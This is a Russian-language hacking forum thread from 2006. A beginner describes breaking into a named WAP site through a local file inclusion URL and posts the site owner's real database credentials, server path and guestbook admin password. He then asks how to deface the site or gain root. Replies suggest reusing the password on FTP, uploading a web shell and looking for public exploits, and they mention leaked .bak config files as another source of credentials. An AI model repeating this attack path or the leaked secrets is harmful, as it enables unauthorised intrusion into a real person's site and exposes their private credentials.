Вопросик про userdb и root

Discussion in 'PHP' started by Muha, 25 Aug 2006.

  1. Muha

    Muha Elder - Старейшина

    Joined:
    21 Aug 2006
    Messages:
    58
    Likes Received:
    5
    Reputations:
    -3
    Приветствую всех. Подскажите пожалуйста. Если есть пароли к БД, но не рутовские. Например:
    $dbuser="kronas_forum";
    $dbpass="1387";
    $dbserver="localhost";
    $dbname="kronas_forum";
    можно ли взломать сайт или как-нибудь достать пароли от рута. Заранее спасибо.
     
  2. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    Доступ к ftp есть?
     
  3. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,362
    Likes Received:
    1,157
    Reputations:
    430
    На мой взгляд, если такой лоховской пароль - 1387, то он скорее всего должен подойти к фтп.
    2 Muha Если прокатит, то лей туда какой-нить шелл, а дальше по стандартной теме... Вообщем пробуй...
    Хотя чё я говорю-то, откуда он получил эти данные?!-значит шелл-то есть...
    Если есть то смотри чё за система или сервисы и ищи сплоеты на милворме каком-нить...
     
    #3 Ch3ck, 25 Aug 2006
    Last edited: 25 Aug 2006
    1 person likes this.
  4. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Лоховский пароль он поставить тока на бд, т.к. это не серьезней фтп =)
    Пароль узнать он мог нескольки способами:

    - local include
    - файл config.php.bak (к примеру)
     
  5. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,362
    Likes Received:
    1,157
    Reputations:
    430
    ::Сорри за флейм и оффтоп::
    ну не согласен с тобой...
    это ты меня ещё учить будешь?! :cool: :)
    Хм, на счёт config.php.bak да и вообще, откуда он мог знать что такой файл есть на серве?
    Значит шелл есть...
     
    #5 Ch3ck, 25 Aug 2006
    Last edited: 25 Aug 2006
  6. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    400
    Likes Received:
    151
    Reputations:
    80
    хы ))) такой лох врятли бы переименовывал в бак )))
    апач нужно настраивать, чтобы отдавал тока определенные типы - если тип не определен - запись в лог :cool:
     
  7. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    Muha учись задовать вопрос подробнее мы чесно не можем помоч зная только пароли и хост)) так что рассказывай))
     
  8. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    гЫ..гЫ почему сразу лох?? может админы настроили))
     
  9. Muha

    Muha Elder - Старейшина

    Joined:
    21 Aug 2006
    Messages:
    58
    Likes Received:
    5
    Reputations:
    -3
    Вообщем так. Захожу я как-то к себе в гостевую. Смотрю, кто-то рекламит свой сайт. А я это не очень люблю. Зашёл я в гости к рекламщику. И начал искать знаменитый чат якобы бодра. Это вап сайт http://kronex.vipzone.biz Нашёл я там чат. И начал искать файл syst/bib.php Файла не было. Попробовал syst/wapes.php Я обрадовался. Начал смотреть его пороль от БД к чату таким образом http://kronex.vipzone.biz/speak/chat/syst/wapes.php?ot=../inc.php Страница пустая, но посмотрев исходный код страницы мы видим пароль. Но после того, как я узнал его пароль от БД к чату, я расстроился, так как он был не рутовским
    $MySQL_Hostname = "localhost";
    $MySQL_Username = "kronas_chat";
    $MySQL_Password = "1387";
    $MySQLDatabasename = "kronas_chat";
    Затем я зашёл в его чат и узнал путь, где лежит сайт /home/kronas/public_html/
    Посмотрев на его сайт, я увидел, что у него много скриптов на БД. И начал смотреть пароли ко всем скриптам.
    Вот что обнаружил:

    $dbuser="kronas_forum";
    $dbpass="1387";
    $dbserver="localhost";
    $dbname="kronas_forum";

    $MySQL_Hostname = "localhost";
    $MySQL_Username = "kronas_mafia";
    $MySQL_Password = "1387";
    $MySQLDatabasename = "kronas_mafia";

    $user="kronas_tamago4i";
    $parol="1387";
    $database="kronas_mafia";
    $host="localhost";
    Имя админа в гостевой книге: Kronus Пароль: c1387z
    Зашёл я под админом в гостевую написал ему чтобы он со мной связался по мылу, он так и не написал. Но не в этом суть. Вот меня интересует, что-нибудь можно сделать полезного с этими паролями.
    Вот теперь нормально объяснил?
    Спасибо, что сразу откликнулись. я встречаю первый форум, где помагают моментально
     
  10. Muha

    Muha Elder - Старейшина

    Joined:
    21 Aug 2006
    Messages:
    58
    Likes Received:
    5
    Reputations:
    -3
    Кстати, к FTPшнику не подошли пароли :(
     
    #10 Muha, 26 Aug 2006
    Last edited: 26 Aug 2006
  11. Muha

    Muha Elder - Старейшина

    Joined:
    21 Aug 2006
    Messages:
    58
    Likes Received:
    5
    Reputations:
    -3
    А как шелл туда залить я даже и представить не могу. Таких страниц типа ?page=страница у него не нашёл. А другие способы я и не знаю :(
    Я ещё новичёк в этом деле.
     
  12. Muha

    Muha Elder - Старейшина

    Joined:
    21 Aug 2006
    Messages:
    58
    Likes Received:
    5
    Reputations:
    -3
    Странно. Вроде я в другом раздеде тему создавал. В разделе PHP, PERL, MySQL, JavaScript. Надо было очки одеть. модеры, если можете, перенесите эту тему в раздел PHP, PERL, MySQL, JavaScript
     
    #12 Muha, 26 Aug 2006
    Last edited: 26 Aug 2006
  13. Muha

    Muha Elder - Старейшина

    Joined:
    21 Aug 2006
    Messages:
    58
    Likes Received:
    5
    Reputations:
    -3
    Ну вот я описал вроде подробно. Так можно ли с этими данными задефейсить сайт или получить рута?